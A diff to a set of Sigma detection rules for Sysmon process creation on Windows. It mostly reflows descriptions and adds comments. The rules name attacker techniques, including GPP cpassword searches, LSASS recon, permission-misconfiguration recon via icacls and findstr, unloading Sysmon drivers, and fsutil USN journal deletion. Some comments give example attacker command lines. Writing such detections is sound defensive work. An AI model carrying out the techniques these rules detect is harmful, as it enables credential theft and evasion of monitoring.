- - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}
- - CommandLine|contains|all:
- - explorer.exe
- - ' /root,'
+ # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference
+ - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data
+ # There exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example
+ # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique.
+ - CommandLine|contains|all:
+ - explorer.exe
+ - ' /root,'
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml
index 36931bb62..e431fed42 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml
@@ -21,7 +21,7 @@ detection:
 selection:
 Image|endswith: \explorer.exe
 ParentImage|endswith: \cmd.exe
- CommandLine|contains: explorer.exe
+ CommandLine|contains: explorer.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate explorer.exe run from cmd.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml b/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml
index 7bf165e9a..2b6cbc52b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml
@@ -1,9 +1,7 @@
 title: Explorer NOUACCHECK Flag
 id: 534f2ef7-e8a2-4433-816d-c91bccde289b
 status: test
-description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag
- that allows to run all sub processes of that newly started explorer.exe without
- any UAC checks
+description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
 references:
 - https://twitter.com/ORCA6665/status/1496478087244095491
 author: Florian Roth (Nextron Systems)
@@ -22,10 +20,10 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \explorer.exe
- CommandLine|contains: /NOUACCHECK
+ CommandLine|contains: /NOUACCHECK
 filter_dc_logon:
- - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- - ParentImage: C:\Windows\System32\svchost.exe
+ - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
+ - ParentImage: C:\Windows\System32\svchost.exe # coarse filter needed for ID 4688 Events
 condition: process_creation and (selection and not 1 of filter_*)
 falsepositives:
 - Domain Controller User Logon
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml
index 848b4e504..392b6f3a5 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml
@@ -1,20 +1,16 @@
 title: Remote File Download Via Findstr.EXE
 id: 587254ee-a24b-4335-b3cd-065c0f1f4baa
 related:
- - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
- type: obsoletes
+ - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
+ type: obsoletes
 status: experimental
-description: 'Detects execution of "findstr" with specific flags and a remote share
- path. This specific set of CLI flags would allow "findstr" to download the content
- of the file located on the remote share as described in the LOLBAS entry.
-
- '
+description: |
+ Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Findstr/
 - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
 - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
-author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali
- (Nextron Systems)
+author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
 date: 2020/10/05
 modified: 2023/11/12
 tags:
@@ -32,19 +28,19 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_findstr:
- - CommandLine|contains: findstr
- - Image|endswith: findstr.exe
- - OriginalFileName: FINDSTR.EXE
+ - CommandLine|contains: findstr
+ - Image|endswith: findstr.exe
+ - OriginalFileName: FINDSTR.EXE
 selection_cli_download_1:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /v '
 - ' -v '
 selection_cli_download_2:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /l '
 - ' -l '
 selection_cli_download_3:
- CommandLine|contains: \\\\
+ CommandLine|contains: \\\\
 condition: process_creation and (selection_findstr and all of selection_cli_download_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml
index d1c8316ef..638a1f4f5 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml
@@ -1,8 +1,7 @@
 title: Findstr GPP Passwords
 id: 91a2c315-9ee6-4052-a853-6f6a8238f90d
 status: test
-description: Look for the encrypted cpassword value within Group Policy Preference
- files on the Domain Controller. This value can be decrypted with gpp-decrypt.
+description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr
 author: frack113
@@ -20,14 +19,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith:
- - \find.exe
- - \findstr.exe
- - OriginalFileName:
- - FIND.EXE
- - FINDSTR.EXE
+ - Image|endswith:
+ - \find.exe
+ - \findstr.exe
+ - OriginalFileName:
+ - FIND.EXE
+ - FINDSTR.EXE
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - cpassword
 - \sysvol\
 - .xml
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml
index 32eb35f44..1aa0d6a01 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml
@@ -1,8 +1,7 @@
 title: Findstr Launching .lnk File
 id: 33339be3-148b-4e16-af56-ad16ec6c7e7b
 status: test
-description: Detects usage of findstr to identify and execute a lnk file as seen within
- the HHS redirect attack
+description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
 references:
 - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/
 author: Trent Liffick
@@ -22,14 +21,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith:
- - \find.exe
- - \findstr.exe
- - OriginalFileName:
- - FIND.EXE
- - FINDSTR.EXE
+ - Image|endswith:
+ - \find.exe
+ - \findstr.exe
+ - OriginalFileName:
+ - FIND.EXE
+ - FINDSTR.EXE
 selection_cli:
- CommandLine|endswith:
+ CommandLine|endswith:
 - .lnk
 - .lnk"
 - .lnk'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml
index a9c57454e..4648778a6 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml
@@ -1,8 +1,7 @@
 title: LSASS Process Reconnaissance Via Findstr.EXE
 id: fe63010f-8823-4864-a96b-a7b4a0f7b929
 status: experimental
-description: Detects findstring commands that include the keyword lsass, which indicates
- recon actviity for the LSASS process PID
+description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
 references:
 - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
 author: Florian Roth (Nextron Systems)
@@ -20,16 +19,16 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_findstr_img:
- - Image|endswith:
- - \find.exe
- - \findstr.exe
- - OriginalFileName:
- - FIND.EXE
- - FINDSTR.EXE
+ - Image|endswith:
+ - \find.exe
+ - \findstr.exe
+ - OriginalFileName:
+ - FIND.EXE
+ - FINDSTR.EXE
 selection_findstr_cli:
- CommandLine|contains: lsass
+ CommandLine|contains: lsass
 selection_special:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /i "lsass'
 - ' /i lsass.exe'
 - findstr "lsass
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml
index 8b88195b1..53fbf851e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml
@@ -1,9 +1,7 @@
 title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
 id: 47e4bab7-c626-47dc-967b-255608c9a920
 status: experimental
-description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This
- is seen being used in combination with "icacls" to look for misconfigured files
- or folders permissions
+description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions
 references:
 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -21,20 +19,24 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_findstr_img:
- - Image|endswith:
- - \find.exe
- - \findstr.exe
- - OriginalFileName:
- - FIND.EXE
- - FINDSTR.EXE
+ - Image|endswith:
+ - \find.exe
+ - \findstr.exe
+ - OriginalFileName:
+ - FIND.EXE
+ - FINDSTR.EXE
 selection_findstr_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - '"Everyone"'
- - '''Everyone'''
+ - "'Everyone'"
 - '"BUILTIN\\"'
- - '''BUILTIN\'''
+ - "'BUILTIN\\'"
 selection_special:
- CommandLine|contains|all:
+ CommandLine|contains|all:
+ # Example CLI would be: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
+ # You could extend it for other groups and users
+ # Example: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
+ # Note: This selection only detects the command when executed from a handler such as a "cmd /c" or "powershell -c"
 - 'icacls '
 - 'findstr '
 - Everyone
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml
index 25d9e9c8b..e1fe22706 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml
@@ -1,15 +1,11 @@
 title: Recon Command Output Piped To Findstr.EXE
 id: ccb5742c-c248-4982-8c5c-5571b9275ad3
 related:
- - id: fe63010f-8823-4864-a96b-a7b4a0f7b929
- type: derived
+ - id: fe63010f-8823-4864-a96b-a7b4a0f7b929
+ type: derived
 status: experimental
-description: 'Detects the excution of a potential recon command where the results
- are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe"
- via the "/c" or "/k" for example. Attackers often time use this to extract specific
- information they require in their chain.
-
- '
+description: |
+ Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist
 - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf
@@ -29,7 +25,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains:
+ CommandLine|contains:
+ # Note: Add additional CLI to increase and enhance coverage
 - 'ipconfig /all | find '
 - 'ipconfig /all | findstr '
 - 'ipconfig | find '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml
index 0509a625a..0de1c8aa0 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml
@@ -1,16 +1,12 @@
 title: Security Tools Keyword Lookup Via Findstr.EXE
 id: 4fe074b4-b833-4081-8f24-7dcfeca72b42
 related:
- - id: fe63010f-8823-4864-a96b-a7b4a0f7b929
- type: derived
+ - id: fe63010f-8823-4864-a96b-a7b4a0f7b929
+ type: derived
 status: experimental
-description: 'Detects execution of "findstr" to search for common names of security
- tools. Attackers often pipe the results of recon commands such as "tasklist" or
- "whoami" to "findstr" in order to filter out the results.
-
+description: |
+ Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
 This detection focuses on the keywords that the attacker might use as a filter.
-
- '
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery
 - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
@@ -30,14 +26,19 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith:
- - \find.exe
- - \findstr.exe
- - OriginalFileName:
- - FIND.EXE
- - FINDSTR.EXE
+ - Image|endswith:
+ - \find.exe
+ - \findstr.exe
+ - OriginalFileName:
+ - FIND.EXE
+ - FINDSTR.EXE
 selection_cli:
- CommandLine|endswith:
+ CommandLine|endswith:
+ # Note: Add additional keywords to increase and enhance coverage
+ # Note:
+ # We use the double quote variation because in cases of where the command is executed through cmd for example:
+ # cmd /c "tasklist | findstr virus"
+ # Logging utilties such as Sysmon would capture the end quote as part of findstr execution
 - ' avira'
 - ' avira"'
 - ' cb'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml
index d2011bf97..977525dc2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml
@@ -1,21 +1,16 @@
 title: Insensitive Subfolder Search Via Findstr.EXE
 id: 04936b66-3915-43ad-a8e5-809eadfd1141
 related:
- - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
- type: obsoletes
+ - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
+ type: obsoletes
 status: experimental
-description: 'Detects execution of findstr with the "s" and "i" flags for a "subfolder"
- and "insensitive" search respectively. Attackers sometimes leverage this built-in
- utility to search the system for interesting files or filter through results of
- commands.
-
- '
+description: |
+ Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Findstr/
 - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
 - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
-author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali
- (Nextron Systems)
+author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
 date: 2020/10/05
 modified: 2023/11/12
 tags:
@@ -33,15 +28,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_findstr:
- - CommandLine|contains: findstr
- - Image|endswith: findstr.exe
- - OriginalFileName: FINDSTR.EXE
+ - CommandLine|contains: findstr
+ - Image|endswith: findstr.exe
+ - OriginalFileName: FINDSTR.EXE
 selection_cli_search_subfolder:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /s '
 - ' -s '
 selection_cli_search_insensitive:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /i '
 - ' -i '
 condition: process_creation and (selection_findstr and all of selection_cli_search_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml
index 5e1957fd1..d7d793c4b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml
@@ -1,9 +1,7 @@
 title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
 id: 37db85d1-b089-490a-a59a-c7b6f984f480
 status: test
-description: Detects usage of "findstr" with the argument "385201". Which could indicate
- potential discovery of an installed Sysinternals Sysmon service using the default
- driver altitude (even if the name is changed).
+description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service
 author: frack113
@@ -21,14 +19,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith:
- - \find.exe
- - \findstr.exe
- - OriginalFileName:
- - FIND.EXE
- - FINDSTR.EXE
+ - Image|endswith:
+ - \find.exe
+ - \findstr.exe
+ - OriginalFileName:
+ - FIND.EXE
+ - FINDSTR.EXE
 selection_cli:
- CommandLine|contains: ' 385201'
+ CommandLine|contains: ' 385201' # Sysmon driver default altitude
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml
index 93a5b9f55..30ca27513 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml
@@ -1,8 +1,7 @@
 title: Finger.exe Suspicious Invocation
 id: af491bca-e752-4b44-9c86-df5680533dbc
 status: test
-description: Detects suspicious aged finger.exe tool execution often used in malware
- attacks nowadays
+description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays
 references:
 - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12
 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/
@@ -22,8 +21,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - OriginalFileName: finger.exe
- - Image|endswith: \finger.exe
+ - OriginalFileName: finger.exe
+ - Image|endswith: \finger.exe
 condition: process_creation and selection
 falsepositives:
 - Admin activity (unclear what they do nowadays with finger.exe)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml
index bd7769cc7..aee8acc06 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml
@@ -1,8 +1,8 @@
 title: Filter Driver Unloaded Via Fltmc.EXE
 id: 4931188c-178e-4ee7-a348-39e8a7a56821
 related:
- - id: 4d7cda18-1b12-4e52-b45c-d28653210df8
- type: derived
+ - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 # Sysmon specific
+ type: derived
 status: test
 description: Detect filter driver unloading activity via fltmc.exe
 references:
@@ -25,12 +25,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \fltMC.exe
- - OriginalFileName: fltMC.exe
+ - Image|endswith: \fltMC.exe
+ - OriginalFileName: fltMC.exe
 selection_cli:
- CommandLine|contains: unload
+ CommandLine|contains: unload
 filter_avira:
- CommandLine|endswith: unload rtp_filesystem_filter
+ # ParentImage: C:\Users\ciadmin\AppData\Local\Temp\is-URCLK.tmp\endpoint-protection-installer-x64.tmp
+ CommandLine|endswith: unload rtp_filesystem_filter
 condition: process_creation and (all of selection_* and not 1 of filter_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml
index ebe6cc875..9af0b8289 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml
@@ -1,8 +1,8 @@
 title: Sysmon Driver Unloaded Via Fltmc.EXE
 id: 4d7cda18-1b12-4e52-b45c-d28653210df8
 related:
- - id: 4931188c-178e-4ee7-a348-39e8a7a56821
- type: similar
+ - id: 4931188c-178e-4ee7-a348-39e8a7a56821 # Generic
+ type: similar
 status: test
 description: Detects possible Sysmon filter driver unloaded via fltmc.exe
 references:
@@ -24,10 +24,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \fltMC.exe
- - OriginalFileName: fltMC.exe
+ - Image|endswith: \fltMC.exe
+ - OriginalFileName: fltMC.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - unload
 - sysmon
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml
index 8d3f0ff75..f544363ed 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml
@@ -1,10 +1,8 @@
 title: Forfiles.EXE Child Process Masquerading
 id: f53714ec-5077-420e-ad20-907ff9bb2958
 status: experimental
-description: 'Detects the execution of "forfiles" from a non-default location, in
- order to potentially spawn a custom "cmd.exe" from the current working directory.
-
- '
+description: |
+ Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
 references:
 - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/
 author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
@@ -21,11 +19,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
+ # Notes:
+ # - The parent must not have CLI options
+ # - The Child Image must be named "cmd" as its hardcoded in the "forfiles" binary
+ # - The Child CLI will always contains "/c echo" as its hardcoded in the original "forfiles" binary
 ParentCommandLine|endswith:
 - .exe
 - .exe"
 Image|endswith: \cmd.exe
- CommandLine|startswith: /c echo "
+ CommandLine|startswith: /c echo "
 filter_main_parent_not_sys:
 ParentImage|contains:
 - :\Windows\System32\
diff --git a/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml b/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml
index 3cccda4b2..f86085e64 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml
@@ -1,24 +1,19 @@
 title: Forfiles Command Execution
 id: 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b
 related:
- - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8
- type: obsoletes
- - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
- type: obsoletes
+ - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8
+ type: obsoletes
+ - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
+ type: obsoletes
 status: test
-description: 'Detects the execution of "forfiles" with the "/c" flag.
-
- While this is an expected behavior of the tool, it can be abused in order to proxy
- execution through it with any binary.
-
+description: |
+ Detects the execution of "forfiles" with the "/c" flag.
+ While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
 Can be used to bypass application whitelisting.
-
- '
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/
 - https://pentestlab.blog/2020/07/06/indirect-command-execution/
-author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame),
- oscd.community
+author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
 date: 2022/06/14
 modified: 2024/01/05
 tags:
@@ -33,10 +28,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \forfiles.exe
- - OriginalFileName: forfiles.exe
+ - Image|endswith: \forfiles.exe
+ - OriginalFileName: forfiles.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /c '
 - ' -c '
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml b/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml
index b3206b0c5..347f56036 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml
@@ -20,10 +20,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \fsutil.exe
- - OriginalFileName: fsutil.exe
+ - Image|endswith: \fsutil.exe
+ - OriginalFileName: fsutil.exe
 selection_cli:
- CommandLine|contains: drives
+ CommandLine|contains: drives
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Certain software or administrative tasks may trigger false positives.
diff --git a/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml b/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml
index 979795269..f558d6641 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml
@@ -1,13 +1,9 @@
 title: Fsutil Behavior Set SymlinkEvaluation
 id: c0b2768a-dd06-4671-8339-b16ca8d1f27f
 status: test
-description: 'A symbolic link is a type of file that contains a reference to another
- file.
-
- This is probably done to make sure that the ransomware is able to follow shortcuts
- on the machine in order to find the original file to encrypt
-
- '
+description: |
+ A symbolic link is a type of file that contains a reference to another file.
+ This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
 references:
 - https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware
 - https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior
@@ -26,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - Image|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'behavior ' - 'set ' - SymlinkEvaluation diff --git a/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml index f2ad7594c..3c1cd6b45 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml @@ -1,12 +1,9 @@ title: Fsutil Suspicious Invocation id: add64136-62e5-48ea-807e-88638d02df1e status: stable -description: 'Detects suspicious parameters of fsutil (deleting USN journal, configuring - it with small size, etc). - +description: | + Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others). - - ' references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md @@ -30,13 +27,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - Image|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: - - deletejournal - - createjournal - - setZeroData + CommandLine|contains: + - deletejournal # usn deletejournal ==> generally ransomware or attacker + - createjournal # usn createjournal ==> can modify config to set it to a tiny size + - setZeroData # file setZeroData ==> empties a file with zeroes condition: process_creation and (all of selection_*) falsepositives: - Admin activity 
